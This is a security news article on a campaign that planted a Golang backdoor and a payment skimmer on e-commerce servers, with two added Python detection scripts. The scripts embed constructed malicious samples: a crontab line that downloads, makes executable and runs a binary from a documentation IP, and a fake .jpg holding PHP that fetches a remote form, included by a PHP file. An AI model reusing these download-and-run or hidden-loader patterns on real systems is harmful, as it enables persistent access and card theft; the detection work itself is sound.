Hackers use Linux backdoor on compromised e-commerce sites with software skimmers

Security researchers have discovered a new hacking campaign that installs a Linux backdoor on compromised e-commerce sites after a credit card skimmer has been deployed on the merchant's website.

Researchers from the Sansec Threat Research Team discovered a new malicious agent, “linux_avp”, which hides as a system process on e-commerce servers. They said attackers began using the malware around the world last week and that it takes its commands from a control server in Beijing.

In the campaign, the attackers ran automated probes against e-commerce sites, testing dozens of known vulnerabilities in popular online shop platforms.

“After a day and a half, the attacker found a file upload vulnerability in one of the store’s plugins. He/she then uploaded a webshell and modified the server code to intercept customer data,” the researchers said.

The researchers said the attackers then uploaded malware named linux_avp, a Golang program that, once started, removes its own binary from disk and disguises itself as a fake ps -ef process.

“Analysis of linux_avp suggests that it is acting as a backdoor, waiting for commands from a server hosted in Beijing (Alibaba),” the researchers said. The binary also revealed that a user known as “dob” built the backdoor in a project folder named lin_avp, codenamed GREECE.

The malware also injects a malicious crontab entry to retain access if the process is killed or the server is restarted. The cron job re-downloads the Golang executable into a random writable directory and installs two configuration files. “One contains a public key that is believed to be used to ensure that no one other than the malware owner can execute commands,” the researchers added.
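The two host-side traits described above, a process that has unlinked its own binary while calling itself ps -ef, and a cron entry that re-downloads and runs an executable from a writable directory, are both cheap to check for. The following is an added detection example written for this article, not code from Sansec or from the malware; the process records, the crontab text and the 203.0.113.10 address in it are constructed for illustration.

```python
"""Hunt for a linux_avp-style resident backdoor on a Linux host: a process whose
binary was deleted from disk and which renamed itself after a common tool such
as 'ps -ef', plus a cron job that re-downloads and runs an executable.
Added detection example; the sample process records and crontab below are
constructed, not captured from the incident."""
import os
import re
from dataclasses import dataclass
from typing import Iterator


@dataclass
class ProcInfo:
    pid: int
    cmdline: str  # /proc/<pid>/cmdline with NUL separators replaced by spaces
    exe: str      # readlink(/proc/<pid>/exe); ends with ' (deleted)' if unlinked


# Tools a backdoor is likely to imitate in argv[0]; a genuine one runs from an
# executable of the same name. Kept small to avoid false positives from
# interpreters and symlinked shells (e.g. 'sh' resolving to dash).
COMMONLY_IMITATED = {"ps", "top", "sshd", "cron", "crond"}


def process_findings(p: ProcInfo) -> list[str]:
    """Return reasons the process looks like a masquerading backdoor."""
    findings = []
    exe_path = p.exe
    if exe_path.endswith(" (deleted)"):
        findings.append("executable deleted from disk")
        exe_path = exe_path[: -len(" (deleted)")]
    argv = p.cmdline.split()
    argv0 = os.path.basename(argv[0]) if argv else ""
    exe_name = os.path.basename(exe_path)
    if argv0 in COMMONLY_IMITATED and argv0 != exe_name:
        findings.append(f"argv[0] {argv0!r} but executable is {exe_name!r}")
    return findings


DOWNLOADER = re.compile(r"\b(curl|wget)\b")
RUN_AFTER_DOWNLOAD = (
    re.compile(r"\|\s*(ba)?sh\b"),               # piped straight into a shell
    re.compile(r"\bchmod\s+(\+x|[0-7]{3,4})\b"),  # made executable after download
    re.compile(r"/(tmp|var/tmp|dev/shm)/"),       # world-writable staging dirs
)


def crontab_findings(text: str) -> list[tuple[int, str]]:
    """Return (line number, entry) for cron lines that download and then execute."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        if DOWNLOADER.search(entry) and any(p.search(entry) for p in RUN_AFTER_DOWNLOAD):
            hits.append((lineno, entry))
    return hits


def live_processes() -> Iterator[ProcInfo]:
    """Read every readable process from /proc (Linux only; run as root to see all)."""
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            with open(f"/proc/{entry}/cmdline", "rb") as fh:
                cmdline = fh.read().replace(b"\0", b" ").decode(errors="replace").strip()
            exe = os.readlink(f"/proc/{entry}/exe")
        except OSError:
            continue  # kernel thread, already exited, or not readable by this user
        yield ProcInfo(int(entry), cmdline, exe)


# Constructed records: a fake 'ps -ef' running from an unlinked binary, and a real ps.
SAMPLE_PROCS = [
    ProcInfo(4242, "ps -ef", "/tmp/.x/linux_avp (deleted)"),
    ProcInfo(4243, "ps -ef", "/usr/bin/ps"),
]
# Constructed crontab; 203.0.113.10 is a documentation address, not a real C2.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh >/dev/null 2>&1
*/5 * * * * curl -s http://203.0.113.10/avp -o /dev/shm/.x && chmod +x /dev/shm/.x && /dev/shm/.x
"""

if __name__ == "__main__":
    procs = list(live_processes()) if os.path.isdir("/proc") else SAMPLE_PROCS
    for p in procs:
        for reason in process_findings(p):
            print(f"pid {p.pid} [{p.cmdline}]: {reason}")
    cron_text = SAMPLE_CRONTAB
    if os.path.isfile("/etc/crontab"):
        with open("/etc/crontab", encoding="utf-8", errors="replace") as fh:
            cron_text = fh.read()
    for lineno, entry in crontab_findings(cron_text):
        print(f"crontab line {lineno}: {entry}")
```

Treat both checks as triage signals rather than verdicts: a daemon whose package was upgraded while it kept running also shows an “(deleted)” executable until restart, and legitimate cron jobs do fetch and run installers. Per-user crontabs under /var/spool/cron and files in /etc/cron.d deserve the same scan as /etc/crontab.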

This case has another Chinese connection, according to the researchers: a line was added to the e-commerce platform’s code at app/design/frontend/favicon_absolute_top.jpg, containing PHP code that fetches a fake payment form and injects it into the store. The researchers said the IP address it fetched from was hosted in Hong Kong and had previously been observed as a skimming exfiltration endpoint in July and August of this year.
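A file with an image extension that actually holds PHP, and a PHP file that includes it, are both easy to spot with a file-system sweep of the store's code. The following is an added example written for this article, not Sansec's tooling or the skimmer's code; the directory layout and file contents it builds are constructed, and the 198.51.100.7 address is a documentation address standing in for the Hong Kong host.

```python
"""Find PHP hiding in image files under a store's code tree, and PHP files
that include such an image, the pattern reported for
app/design/frontend/favicon_absolute_top.jpg. Added detection example; the
sample tree below is constructed for illustration."""
import os
import re
import tempfile

IMAGE_EXT = {".jpg", ".jpeg", ".png", ".gif", ".ico"}
# Leading bytes a genuine file of each type starts with (JPEG, PNG, GIF, ICO).
IMAGE_MAGIC = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"GIF87a", b"GIF89a", b"\x00\x00\x01\x00")
PHP_OPEN_TAG = re.compile(rb"<\?(php\b|=)")
# include/require of a path with an image extension from PHP source
IMAGE_INCLUDE = re.compile(
    rb"\b(include|require)(_once)?\s*\(?\s*['\"][^'\"]+\.(jpe?g|png|gif|ico)['\"]",
    re.IGNORECASE,
)


def file_findings(name: str, data: bytes) -> list[str]:
    """Return the reasons a file is suspicious; an empty list means clean."""
    findings = []
    ext = os.path.splitext(name)[1].lower()
    if ext in IMAGE_EXT:
        if not data.startswith(IMAGE_MAGIC):
            findings.append("no image magic bytes")
        if PHP_OPEN_TAG.search(data):
            findings.append("contains PHP open tag")
    elif ext in (".php", ".phtml"):
        if IMAGE_INCLUDE.search(data):
            findings.append("includes an image file as PHP")
    return findings


def scan_tree(root: str) -> list[tuple[str, str]]:
    """Walk root and report (path relative to root, reason) for suspicious files."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            for reason in file_findings(fn, data):
                hits.append((rel, reason))
    return sorted(hits)


# Constructed sample tree: one real JPEG header, one "image" that is PHP which
# fetches a remote form, and one PHP file that includes that image.
SAMPLE_FILES = {
    "app/design/frontend/logo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 32,
    "app/design/frontend/favicon_absolute_top.jpg":
        b"<?php echo file_get_contents('http://198.51.100.7/form.html'); ?>",
    "app/bootstrap.php":
        b"<?php\ninclude 'app/design/frontend/favicon_absolute_top.jpg';\n",
}


def build_sample_tree() -> str:
    """Write SAMPLE_FILES into a fresh temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix="storescan-")
    for rel, data in SAMPLE_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_tree()
    for path, reason in scan_tree(target):
        print(f"{path}: {reason}")
```

Run it against the store's document root to sweep the real tree; with no argument it scans the constructed sample. The magic-byte check catches the case where the whole “image” is PHP, and the open-tag search catches PHP appended to an otherwise valid picture, which the web server only executes if something includes the file, hence the second check over .php and .phtml sources.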

Researchers said that at the time of writing, no other antivirus vendor had detected the malware.

“Strangely, an individual had submitted the same malware on VirusTotal on October 8th with the note ‘test’. This was only one day after the successful break-in into our customer’s shop,” the researchers said.

They added that the person who uploaded the sample could very well be the malware author, checking that popular antivirus engines fail to detect their creation.


About Willie Ash
